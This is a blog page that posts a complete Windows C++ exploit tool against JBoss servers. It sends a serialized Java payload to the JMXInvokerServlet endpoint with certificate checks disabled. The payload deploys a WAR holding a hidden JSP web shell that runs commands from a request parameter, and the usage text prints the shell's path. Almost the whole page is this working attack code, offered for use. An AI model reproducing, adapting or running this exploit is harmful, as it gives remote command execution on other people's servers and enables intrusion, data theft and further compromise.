• Jboss remote getshell (JMXInvokerServlet) vc版


    #include "stdafx.h"
    #include <Windows.h>
    #include <stdio.h>
    #include <winhttp.h>
    #include <comdef.h>
    #pragma comment (lib,"Winhttp.lib")
    
    char shell_invoke[] = ( 
        "xacxedx00x05x73x72x00x29x6fx72x67x2ex6ax62x6fx73" ///shellinvoker/shellinvoker.jsp
        "x73x2ex69x6ex76x6fx63x61x74x69x6fx6ex2ex4dx61x72"
        "x73x68x61x6cx6cx65x64x49x6ex76x6fx63x61x74x69x6f"
        "x6exf6x06x95x27x41x3exa4xbex0cx00x00x78x70x70x77"
        "x08x78x94x98x47xc1xd0x53x87x73x72x00x11x6ax61x76"
        "x61x2ex6cx61x6ex67x2ex49x6ex74x65x67x65x72x12xe2"
        "xa0xa4xf7x81x87x38x02x00x01x49x00x05x76x61x6cx75"
        "x65x78x72x00x10x6ax61x76x61x2ex6cx61x6ex67x2ex4e"
        "x75x6dx62x65x72x86xacx95x1dx0bx94xe0x8bx02x00x00"
        "x78x70xe3x2cx60xe6x73x72x00x24x6fx72x67x2ex6ax62"
        "x6fx73x73x2ex69x6ex76x6fx63x61x74x69x6fx6ex2ex4d"
        "x61x72x73x68x61x6cx6cx65x64x56x61x6cx75x65xeaxcc"
        "xe0xd1xf4x4axd0x99x0cx00x00x78x70x7ax00x00x02xc6"
        "x00x00x02xbexacxedx00x05x75x72x00x13x5bx4cx6ax61"
        "x76x61x2ex6cx61x6ex67x2ex4fx62x6ax65x63x74x3bx90"
        "xcex58x9fx10x73x29x6cx02x00x00x78x70x00x00x00x04"
        "x73x72x00x1bx6ax61x76x61x78x2ex6dx61x6ex61x67x65"
        "x6dx65x6ex74x2ex4fx62x6ax65x63x74x4ex61x6dx65x0f"
        "x03xa7x1bxebx6dx15xcfx03x00x00x78x70x74x00x2cx6a"
        "x62x6fx73x73x2ex61x64x6dx69x6ex3ax73x65x72x76x69"
        "x63x65x3dx44x65x70x6cx6fx79x6dx65x6ex74x46x69x6c"
        "x65x52x65x70x6fx73x69x74x6fx72x79x78x74x00x05x73"
        "x74x6fx72x65x75x71x00x7ex00x00x00x00x00x05x74x00"
        "x10x73x68x65x6cx6cx69x6ex76x6fx6bx65x72x2ex77x61"
        "x72x74x00x0cx73x68x65x6cx6cx69x6ex76x6fx6bx65x72"
        "x74x00x04x2ex6ax73x70x74x01x79x3cx25x40x20x70x61"
        "x67x65x20x69x6dx70x6fx72x74x3dx22x6ax61x76x61x2e"
        "x75x74x69x6cx2ex2ax2cx6ax61x76x61x2ex69x6fx2ex2a"
        "x22x25x3ex3cx70x72x65x3ex3cx25x69x66x28x72x65x71"
        "x75x65x73x74x2ex67x65x74x50x61x72x61x6dx65x74x65"
        "x72x28x22x70x70x70x22x29x20x21x3dx20x6ex75x6cx6c"
        "x20x26x26x20x72x65x71x75x65x73x74x2ex67x65x74x48"
        "x65x61x64x65x72x28x22x75x73x65x72x2dx61x67x65x6e"
        "x74x22x29x2ex65x71x75x61x6cx73x28x22x6ax65x78x62"
        "x6fx73x73x22x29x20x29x20x7bx20x50x72x6fx63x65x73"
        "x73x20x70x20x3dx20x52x75x6ex74x69x6dx65x2ex67x65"
        "x74x52x75x6ex74x69x6dx65x28x29x2ex65x78x65x63x28"
        "x72x65x71x75x65x73x74x2ex67x65x74x50x61x72x61x6d"
        "x65x74x65x72x28x22x70x70x70x22x29x29x3bx20x44x61"
        "x74x61x49x6ex70x75x74x53x74x72x65x61x6dx20x64x69"
        "x73x20x3dx20x6ex65x77x20x44x61x74x61x49x6ex70x75"
        "x74x53x74x72x65x61x6dx28x70x2ex67x65x74x49x6ex70"
        "x75x74x53x74x72x65x61x6dx28x29x29x3bx20x53x74x72"
        "x69x6ex67x20x64x69x73x72x20x3dx20x64x69x73x2ex72"
        "x65x61x64x4cx69x6ex65x28x29x3bx20x77x68x69x6cx65"
        "x20x28x20x64x69x73x72x20x21x3dx20x6ex75x6cx6cx20"
        "x29x20x7bx20x6fx75x74x2ex70x72x69x6ex74x6cx6ex28"
        "x64x69x73x72x29x3bx20x64x69x73x72x20x3dx20x64x69"
        "x73x2ex72x65x61x64x4cx69x6ex65x28x29x3bx20x7dx20"
        "x7dx25x3ex73x72x00x11x6ax61x76x61x2ex6cx61x6ex67"
        "x2ex42x6fx6fx6cx65x61x6excdx20x72x80xd5x9cxfaxee"
        "x02x00x01x5ax00x05x76x61x6cx75x65x78x70x01x75x72"
        "x00x13x5bx4cx6ax61x76x61x2ex6cx61x6ex67x2ex53x74"
        "x72x69x6ex67x3bxadxd2x56xe7xe9x1dx7bx47x02x00x00"
        "x78x70x00x00x00x05x74x00x10x6ax61x76x61x2ex6cx61"
        "x6ex67x2ex53x74x72x69x6ex67x71x00x7ex00x0fx71x00"
        "x7ex00x0fx71x00x7ex00x0fx74x00x07x62x6fx6fx6cx65"
        "x61x6ex63x79xb8x87x78x77x08x00x00x00x00x00x00x00"
        "x01x73x72x00x22x6fx72x67x2ex6ax62x6fx73x73x2ex69"
        "x6ex76x6fx63x61x74x69x6fx6ex2ex49x6ex76x6fx63x61"
        "x74x69x6fx6ex4bx65x79xb8xfbx72x84xd7x93x85xf9x02"
        "x00x01x49x00x07x6fx72x64x69x6ex61x6cx78x70x00x00"
        "x00x04x70x78");
    
    void request_https(wchar_t* Host,int port)
    {
        DWORD dwSize = 0;
        DWORD dwDownloaded = 0;
        LPSTR pszOutBuffer;
        BOOL bResults = FALSE;
        HINTERNET hSession = NULL,
            hConnect = NULL,
            hRequest = NULL;
    
        // Use WinHttpOpen to obtain a session handle.
        hSession = WinHttpOpen( L"WinHTTP Example/1.0",
            WINHTTP_ACCESS_TYPE_DEFAULT_PROXY,
            WINHTTP_NO_PROXY_NAME,
            WINHTTP_NO_PROXY_BYPASS, 0);
    
        // Specify an HTTP server.
        if (hSession)
            hConnect = WinHttpConnect( hSession,Host,
            port, 0);
    
        // Create an HTTP request handle.
        if (hConnect)
            hRequest = WinHttpOpenRequest( hConnect, L"POST",L"/invoker/JMXInvokerServlet",
            NULL, WINHTTP_NO_REFERER,
            WINHTTP_DEFAULT_ACCEPT_TYPES,
            WINHTTP_FLAG_SECURE);
    
        DWORD options = SECURITY_FLAG_IGNORE_CERT_CN_INVALID |
            SECURITY_FLAG_IGNORE_CERT_DATE_INVALID |
            SECURITY_FLAG_IGNORE_UNKNOWN_CA ;
    
        if( hRequest )
            bResults = WinHttpAddRequestHeaders( hRequest,
            L"Content-Type: application/x-java-serialized-object; class=org.jboss.invocation.MarshalledValue"
            ,(ULONG)-1L,WINHTTP_ADDREQ_FLAG_ADD );
    
        bResults = WinHttpAddRequestHeaders( hRequest, 
            L"Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2",(ULONG)-1L,WINHTTP_ADDREQ_FLAG_ADD );
    
        bResults = WinHttpSetOption( hRequest, WINHTTP_OPTION_SECURITY_FLAGS ,
            (LPVOID)&options, sizeof (DWORD) );
    
        if(bResults == FALSE){
            printf("Error in WinHttpQueryOption WINHTTP_OPTION_SECURITY_FLAGS: %ld
    ",GetLastError());
        }
    
        // Send a request.
        if (hRequest){
            bResults = WinHttpSendRequest( hRequest,
                WINHTTP_NO_ADDITIONAL_HEADERS, 0,
                shell_invoke, WORD(sizeof(shell_invoke)),
                sizeof(shell_invoke), 0);
            if(bResults == FALSE)
                printf ("WinHttpSendRequest error: %ld
    ",GetLastError());
        }
    
        if( hRequest ) WinHttpCloseHandle( hRequest );
        if( hConnect ) WinHttpCloseHandle( hConnect );
        if( hSession ) WinHttpCloseHandle( hSession );
    }
    
    
    void request_http(wchar_t* Host, int Port)
    {
        DWORD dwSize = sizeof(DWORD);
        DWORD dwStatusCode = 0;
        BOOL  bResults = FALSE;
        HINTERNET hSession = NULL,
        hConnect = NULL,
        hRequest = NULL;
    
        // Use WinHttpOpen to obtain a session handle.
        hSession = WinHttpOpen(L"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 Safari/537.36", 
            WINHTTP_ACCESS_TYPE_DEFAULT_PROXY,
            WINHTTP_NO_PROXY_NAME, 
            WINHTTP_NO_PROXY_BYPASS,
            0 );
    
        // Specify an HTTP server.
        if( hSession )
            hConnect = WinHttpConnect( hSession,
            Host,
            Port,
            0 );
    
        // Create an HTTP Request handle.
        if( hConnect )
            hRequest = WinHttpOpenRequest( hConnect,
            L"POST",L"/invoker/JMXInvokerServlet",  // /invoker/JMXInvokerServlet
            NULL,
            WINHTTP_NO_REFERER, 
            WINHTTP_DEFAULT_ACCEPT_TYPES,
            0 );
        // Add a request header.
        if( hRequest )
            bResults = WinHttpAddRequestHeaders( hRequest,
            L"Content-Type: application/x-java-serialized-object; class=org.jboss.invocation.MarshalledValue"
            ,(ULONG)-1L,WINHTTP_ADDREQ_FLAG_ADD );
    
            bResults = WinHttpAddRequestHeaders( hRequest, 
                L"Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2",(ULONG)-1L,WINHTTP_ADDREQ_FLAG_ADD );
        // Send a Request.
        if( bResults ) 
            bResults = WinHttpSendRequest( hRequest, 
            WINHTTP_NO_ADDITIONAL_HEADERS,
            0,
            shell_invoke,WORD(sizeof(shell_invoke)),
            sizeof(shell_invoke),
            0 );
    
        // Report any errors.
        if( !bResults )
            printf( "Error %d has occurred.
    ", GetLastError( ) );
    
        // Close open handles.
        if( hRequest ) WinHttpCloseHandle( hRequest );
        if( hConnect ) WinHttpCloseHandle( hConnect );
        if( hSession ) WinHttpCloseHandle( hSession );
        //return 0;
    }
    
    int main(int argc, char* argv[])
    {
    
        if (argc < 4)
        {
            printf("[*]:%s Jboss Exploit remote getshell
    ",argv[0]);
            printf("[*]:%s Remote_Host Remote_ip http/https 
    ",argv[0]);
            printf("[*]:Getshell Path:/shellinvoker/shellinvoker.jsp
    ");
            return -1;
        }
        wchar_t Host[MAX_PATH] = {0};
        wchar_t procotol[MAX_PATH] = {0};
        wsprintfW(Host, L"%S", argv[1]);
        wsprintfW(procotol,L"%S",argv[3]);
        printf("
    [*]:Host:%S procotol:%S 
    ", Host,procotol);
    
        if (0 == lstrcmpi(procotol, L"http"))
        {
            request_http(Host,atoi(argv[2]));
    
        }else if(0 == lstrcmpi(procotol, L"https"))
        {
            request_https(Host,atoi(argv[2]));
        }else
        {
            printf("
    Unknown option.
    ");
            return 0;
        }
        return 0;
    }

  • 相关阅读:
    GO语言并发
    NEERC2017:L
    bzoj2823[AHOI2012]信号塔
    bzoj1336[Balkan2002]Alien最小圆覆盖
    bzoj1069[SCOI2007]最大土地面积
    ACM2017Tsukuba:H
    ACM2015沈阳:B-Bazinga
    bzoj2724[Violet 6]蒲公英
    [bzoj4066]简单题
    [bzoj2125]最短路
  • 原文地址:https://www.cnblogs.com/killbit/p/4489664.html
Copyright © 2020-2023  润新知